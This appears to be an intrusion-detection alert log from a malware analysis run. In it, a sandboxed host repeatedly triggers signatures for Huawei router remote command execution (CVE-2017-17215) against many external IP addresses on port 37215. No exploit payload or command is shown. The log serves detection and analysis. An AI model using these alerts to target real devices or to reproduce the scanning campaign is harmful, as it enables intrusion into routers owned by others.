                                                        06/13/24-21:32:40.375107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3436237215192.168.2.14156.194.240.66
                                                        06/13/24-21:31:57.094027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5762637215192.168.2.1441.145.12.182
                                                        06/13/24-21:32:56.790432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470237215192.168.2.14197.156.29.201
                                                        06/13/24-21:31:59.197302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3299437215192.168.2.14156.178.175.24
                                                        06/13/24-21:31:57.153099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913837215192.168.2.1441.126.99.219
                                                        06/13/24-21:32:01.241321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5410837215192.168.2.14197.153.191.27
                                                        06/13/24-21:32:30.076969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3873437215192.168.2.14197.175.146.218
                                                        06/13/24-21:32:38.319867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114237215192.168.2.14197.189.17.204
                                                        06/13/24-21:32:46.508558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317437215192.168.2.14156.16.46.42
                                                        06/13/24-21:32:48.567371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3941637215192.168.2.14156.144.118.209
                                                        06/13/24-21:33:07.060827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5794637215192.168.2.14197.63.161.107
                                                        06/13/24-21:33:04.993784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3540437215192.168.2.14156.29.139.134
                                                        06/13/24-21:33:09.102419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5337437215192.168.2.14156.129.58.189
                                                        06/13/24-21:32:34.216868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867237215192.168.2.14156.198.87.157
                                                        06/13/24-21:33:00.868443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5947837215192.168.2.14197.179.134.89
                                                        06/13/24-21:32:32.152697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4391637215192.168.2.14156.216.168.19
                                                        06/13/24-21:33:17.307603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093637215192.168.2.1441.186.214.245
                                                        06/13/24-21:32:34.193836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3786637215192.168.2.1441.47.55.164
                                                        06/13/24-21:33:00.886283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4194637215192.168.2.14197.210.35.192
                                                        06/13/24-21:32:17.694983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4667037215192.168.2.1441.16.84.109
                                                        06/13/24-21:32:42.409722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150037215192.168.2.1441.158.104.148
                                                        06/13/24-21:32:48.569006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793837215192.168.2.14197.21.203.183
                                                        06/13/24-21:33:09.088529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710637215192.168.2.14156.183.97.124
                                                        06/13/24-21:33:13.213962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3793637215192.168.2.14156.211.246.77
                                                        06/13/24-21:33:11.181809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5042437215192.168.2.14197.179.145.7
                                                        06/13/24-21:32:34.195008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4868437215192.168.2.14156.11.109.226
                                                        06/13/24-21:32:09.440382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4371237215192.168.2.14156.200.44.219
                                                        06/13/24-21:32:13.546332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5353437215192.168.2.14197.224.205.40
                                                        06/13/24-21:32:15.610123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4117037215192.168.2.1441.243.12.231
                                                        06/13/24-21:32:13.566675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6028437215192.168.2.14156.205.150.104
                                                        06/13/24-21:32:30.124340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3290837215192.168.2.1441.217.251.114
                                                        06/13/24-21:32:38.301564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4342637215192.168.2.14197.34.235.89
                                                        06/13/24-21:32:36.244864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3535837215192.168.2.14197.91.205.100
                                                        06/13/24-21:32:28.028540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284637215192.168.2.14156.217.123.109
                                                        06/13/24-21:32:17.675391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5333237215192.168.2.14156.186.74.215
                                                        06/13/24-21:32:15.607256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3758637215192.168.2.14197.86.3.130
                                                        06/13/24-21:31:59.174994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4516637215192.168.2.14197.79.223.191
                                                        06/13/24-21:32:01.223413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4704637215192.168.2.14197.181.148.127
                                                        06/13/24-21:33:00.888499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865637215192.168.2.1441.140.96.82
                                                        06/13/24-21:32:42.424382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5086037215192.168.2.14197.230.59.19
                                                        06/13/24-21:32:07.401789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4907037215192.168.2.14197.242.185.170
                                                        06/13/24-21:32:56.754202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603437215192.168.2.14156.77.255.136
                                                        06/13/24-21:33:04.989897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6046837215192.168.2.14156.90.20.117
                                                        06/13/24-21:33:05.014251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4437237215192.168.2.14197.219.197.127
                                                        06/13/24-21:33:09.128179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4908037215192.168.2.14156.29.206.16
                                                        06/13/24-21:32:52.679449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4002637215192.168.2.1441.247.239.35
                                                        06/13/24-21:31:57.093325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5756037215192.168.2.1441.56.243.110
                                                        06/13/24-21:33:04.989451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4312237215192.168.2.14197.255.197.133
                                                        06/13/24-21:33:13.212692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669237215192.168.2.1441.155.104.201
                                                        06/13/24-21:32:28.042986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314637215192.168.2.1441.153.108.83
                                                        06/13/24-21:32:34.197607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4492837215192.168.2.1441.23.114.21
                                                        06/13/24-21:32:13.546907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762237215192.168.2.1441.102.72.76
                                                        06/13/24-21:32:07.416361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437837215192.168.2.1441.30.100.209
                                                        06/13/24-21:32:52.656683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3623237215192.168.2.1441.141.145.252
                                                        06/13/24-21:32:36.246668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4358837215192.168.2.14156.69.248.248
                                                        06/13/24-21:32:44.457196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183837215192.168.2.14197.191.219.140
                                                        06/13/24-21:32:30.123412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729437215192.168.2.1441.140.23.211
                                                        06/13/24-21:32:11.487998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6051237215192.168.2.1441.38.49.90
                                                        06/13/24-21:32:09.453514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482837215192.168.2.14197.59.67.49
                                                        06/13/24-21:32:44.450849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705437215192.168.2.1441.151.77.246
                                                        06/13/24-21:32:38.296345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5285637215192.168.2.1441.204.26.120
                                                        06/13/24-21:32:56.757697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074637215192.168.2.1441.65.89.157
                                                        06/13/24-21:32:11.508725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892637215192.168.2.14197.54.57.78
                                                        06/13/24-21:32:25.971960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5394237215192.168.2.14197.34.242.51
                                                        06/13/24-21:32:50.610624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5889237215192.168.2.14156.83.2.109
                                                        06/13/24-21:32:38.297641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3481837215192.168.2.1441.45.75.223
                                                        06/13/24-21:33:02.914378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5608637215192.168.2.1441.0.247.9
                                                        06/13/24-21:33:05.011877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4353437215192.168.2.14156.52.12.205
                                                        06/13/24-21:32:01.222263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5103837215192.168.2.1441.69.45.122
                                                        06/13/24-21:32:50.632320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3314237215192.168.2.14197.68.251.253
                                                        06/13/24-21:32:11.508983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4870037215192.168.2.14197.65.41.106
                                                        06/13/24-21:32:48.571918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6067237215192.168.2.1441.2.164.150
                                                        06/13/24-21:32:13.546481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453637215192.168.2.14156.178.232.120
                                                        06/13/24-21:33:13.212207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3746637215192.168.2.14197.124.119.11
                                                        06/13/24-21:31:59.176152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3925037215192.168.2.1441.15.178.30
                                                        06/13/24-21:32:07.402083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223837215192.168.2.14156.53.53.215
                                                        06/13/24-21:32:44.453153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3289837215192.168.2.14156.175.242.187
                                                        06/13/24-21:32:46.504193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3334037215192.168.2.14156.248.180.172
                                                        06/13/24-21:33:11.155093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4579237215192.168.2.14197.111.162.247
                                                        06/13/24-21:32:21.805615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686037215192.168.2.14197.103.71.104
                                                        06/13/24-21:33:13.231374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3379437215192.168.2.14197.54.209.129
                                                        06/13/24-21:32:01.240078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4963037215192.168.2.14156.222.64.102
                                                        06/13/24-21:32:21.805867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5646437215192.168.2.1441.104.153.127
                                                        06/13/24-21:32:30.126341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259437215192.168.2.1441.56.105.160
                                                        06/13/24-21:33:02.912607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979837215192.168.2.1441.255.227.251
                                                        06/13/24-21:33:09.130968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5346237215192.168.2.14156.97.85.91
                                                        06/13/24-21:32:21.801945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4308837215192.168.2.1441.223.100.148
                                                        06/13/24-21:32:46.502724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5242437215192.168.2.1441.204.14.135
                                                        06/13/24-21:32:32.154907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4471837215192.168.2.1441.255.63.53
                                                        06/13/24-21:33:15.258050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608837215192.168.2.14156.30.33.115
                                                        06/13/24-21:32:05.344023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3346037215192.168.2.1441.82.241.103
                                                        06/13/24-21:32:25.978293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131637215192.168.2.1441.45.30.150
                                                        06/13/24-21:32:03.307570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6026437215192.168.2.1441.141.240.146
                                                        06/13/24-21:32:13.545783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3483837215192.168.2.1441.67.229.206
                                                        06/13/24-21:32:40.359492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4937237215192.168.2.14197.156.255.211
                                                        06/13/24-21:32:15.632866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5520837215192.168.2.14156.34.54.131
                                                        06/13/24-21:33:02.937454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4378837215192.168.2.14156.10.146.56
                                                        06/13/24-21:31:59.174711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109237215192.168.2.1441.86.228.153
                                                        06/13/24-21:31:59.176617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3696437215192.168.2.1441.39.143.235
                                                        06/13/24-21:32:38.298630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788437215192.168.2.14197.47.201.115
                                                        06/13/24-21:32:42.418865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4127437215192.168.2.14156.35.48.184
                                                        06/13/24-21:33:05.017326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5365637215192.168.2.1441.124.83.66
                                                        06/13/24-21:32:30.101174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4445637215192.168.2.1441.68.17.158
                                                        06/13/24-21:32:19.754364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4375637215192.168.2.14156.27.71.111
                                                        06/13/24-21:32:44.453693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4098237215192.168.2.14197.65.253.151
                                                        06/13/24-21:33:17.306258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027237215192.168.2.14156.213.158.178
                                                        06/13/24-21:32:03.277920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4768637215192.168.2.14197.248.245.187
                                                        06/13/24-21:32:01.237670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5498437215192.168.2.14197.25.0.100
                                                        06/13/24-21:32:28.046095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4887237215192.168.2.1441.142.200.46
                                                        06/13/24-21:31:57.134307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4973437215192.168.2.14156.150.155.115
                                                        06/13/24-21:32:46.503312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5571437215192.168.2.14197.190.72.234
                                                        06/13/24-21:32:58.844115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5855437215192.168.2.14197.224.22.77
                                                        06/13/24-21:32:21.785039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5125237215192.168.2.1441.229.50.222
                                                        06/13/24-21:33:11.172741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3385237215192.168.2.1441.241.251.111
                                                        06/13/24-21:32:56.786022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4992637215192.168.2.14197.135.159.211
                                                        06/13/24-21:32:38.301782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544037215192.168.2.14197.117.144.29
                                                        06/13/24-21:32:05.349588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5303637215192.168.2.14197.214.219.10
                                                        06/13/24-21:32:52.677800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3989637215192.168.2.1441.219.47.127
                                                        06/13/24-21:32:54.708520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5812637215192.168.2.14156.208.76.84
                                                        06/13/24-21:32:07.401874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5119437215192.168.2.14197.91.254.143
                                                        06/13/24-21:33:13.232021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734237215192.168.2.14197.54.194.43
                                                        06/13/24-21:33:02.936581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475837215192.168.2.14156.183.200.112
                                                        06/13/24-21:32:30.073752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519437215192.168.2.1441.101.159.43
                                                        06/13/24-21:32:52.657212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6007437215192.168.2.14156.252.157.46
                                                        06/13/24-21:32:52.678627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4361237215192.168.2.14156.117.216.47
                                                        06/13/24-21:33:11.154064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5542837215192.168.2.1441.253.241.151
                                                        06/13/24-21:32:54.711537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3350437215192.168.2.1441.246.171.155
                                                        06/13/24-21:32:48.572035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003037215192.168.2.14197.116.68.181
                                                        06/13/24-21:32:25.971034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300437215192.168.2.1441.231.150.86
                                                        06/13/24-21:32:36.265460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608637215192.168.2.14197.170.157.74
                                                        06/13/24-21:32:48.552629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5516637215192.168.2.14197.189.252.218
                                                        06/13/24-21:32:50.630956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5369037215192.168.2.14156.190.124.205
                                                        06/13/24-21:32:23.836540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493637215192.168.2.14156.12.129.83
                                                        06/13/24-21:32:25.975650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4698637215192.168.2.14197.15.133.12
                                                        06/13/24-21:32:58.822109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809837215192.168.2.14197.215.15.177
                                                        06/13/24-21:32:15.633340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336237215192.168.2.14156.184.204.160
                                                        06/13/24-21:32:42.404932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4808437215192.168.2.1441.32.5.222
                                                        06/13/24-21:33:15.258841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3377037215192.168.2.14197.152.49.146
                                                        06/13/24-21:33:02.910011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3950237215192.168.2.1441.138.67.173
                                                        06/13/24-21:32:38.302542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3989237215192.168.2.14156.170.128.197
                                                        06/13/24-21:33:09.130787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4640237215192.168.2.14156.141.121.214
                                                        06/13/24-21:33:15.274394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4247437215192.168.2.1441.59.137.252
                                                        06/13/24-21:32:34.194534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4718437215192.168.2.14197.198.46.207
                                                        06/13/24-21:32:23.837001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975237215192.168.2.14197.32.61.147
                                                        06/13/24-21:32:52.657950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3537837215192.168.2.14197.73.125.39
                                                        06/13/24-21:33:15.274208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999837215192.168.2.1441.181.196.192
                                                        06/13/24-21:32:07.417923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4797237215192.168.2.14156.17.46.171
                                                        06/13/24-21:31:59.176171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769037215192.168.2.14156.223.32.71
                                                        06/13/24-21:32:34.215554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810437215192.168.2.1441.82.189.193
                                                        06/13/24-21:33:13.213627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3504037215192.168.2.1441.122.1.31
                                                        06/13/24-21:32:34.218296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4714637215192.168.2.14197.113.196.227
                                                        06/13/24-21:32:01.223862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4619837215192.168.2.14156.39.242.52
                                                        06/13/24-21:32:03.294483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3857237215192.168.2.14156.196.212.117
                                                        06/13/24-21:33:09.089622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488837215192.168.2.1441.125.140.120
                                                        06/13/24-21:32:03.276779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3372637215192.168.2.14156.109.239.35
                                                        06/13/24-21:32:36.247971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5023237215192.168.2.1441.135.174.24
                                                        06/13/24-21:32:48.572448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3694837215192.168.2.1441.110.154.42
                                                        06/13/24-21:33:04.988443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3743437215192.168.2.14156.158.187.184
                                                        06/13/24-21:32:03.276557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3381037215192.168.2.1441.112.63.221
                                                        06/13/24-21:32:05.377892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4353037215192.168.2.14197.43.169.105
                                                        06/13/24-21:32:07.417588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6029637215192.168.2.1441.149.153.147
                                                        06/13/24-21:33:05.013464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865237215192.168.2.14156.184.26.148
                                                        06/13/24-21:32:36.242365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246237215192.168.2.14156.85.152.197
                                                        06/13/24-21:32:54.711141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5095037215192.168.2.1441.235.27.235
                                                        06/13/24-21:32:01.221418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729437215192.168.2.14197.99.68.176
                                                        06/13/24-21:32:23.836057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5535437215192.168.2.14197.206.31.172
                                                        06/13/24-21:32:38.315960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5794837215192.168.2.1441.252.211.28
                                                        06/13/24-21:32:30.075731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4942237215192.168.2.14156.111.225.23
                                                        06/13/24-21:33:15.271543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5995637215192.168.2.14156.45.71.20
                                                        06/13/24-21:32:23.942481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118437215192.168.2.14197.70.140.205
                                                        06/13/24-21:32:28.027068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896237215192.168.2.14197.117.13.180
                                                        06/13/24-21:33:00.868403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4700037215192.168.2.1441.247.75.246
                                                        06/13/24-21:32:34.199858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004437215192.168.2.14197.27.72.39
                                                        06/13/24-21:32:56.757442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3981637215192.168.2.14197.48.12.242
                                                        06/13/24-21:32:03.273949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5514637215192.168.2.14156.69.91.78
                                                        06/13/24-21:32:15.605638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5986637215192.168.2.14156.29.123.63
                                                        06/13/24-21:31:59.195836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4354637215192.168.2.1441.55.174.73
                                                        06/13/24-21:32:52.675938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260237215192.168.2.14197.153.130.16
                                                        06/13/24-21:33:11.173346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5768837215192.168.2.1441.132.92.152
                                                        06/13/24-21:32:30.100419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482437215192.168.2.14197.205.131.155
                                                        06/13/24-21:32:17.674697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4089037215192.168.2.14197.83.94.31
                                                        06/13/24-21:33:09.089806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269837215192.168.2.14156.0.240.238
                                                        06/13/24-21:32:13.567068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4179637215192.168.2.1441.146.2.231
                                                        06/13/24-21:31:57.089979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967637215192.168.2.1441.79.20.241
                                                        06/13/24-21:32:44.478440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4023637215192.168.2.14156.101.254.204
